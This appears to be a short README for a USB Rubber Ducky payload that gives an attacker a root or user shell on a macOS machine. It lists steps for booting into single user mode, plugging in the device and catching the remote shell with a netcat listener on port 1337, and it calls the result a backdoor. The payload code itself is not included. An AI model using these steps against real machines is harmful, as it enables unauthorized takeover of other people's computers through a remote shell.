OSX-10-Second-Root

Take full control of OSX as root via command line. Here is a tutorial of this backdoor for OSX: http://patrickmosca.com/root-a-mac-in-10-seconds-or-less/

Root Shell

  1. Boot into single user mode (Command – S).
  2. At the command prompt, plug in ducky.
  3. Catch the shell remotely with nc -l -p 1337

User Shell

  1. While OSX is running with GUI, plug in ducky.
  2. Catch the shell remotely with nc -l -p 1337
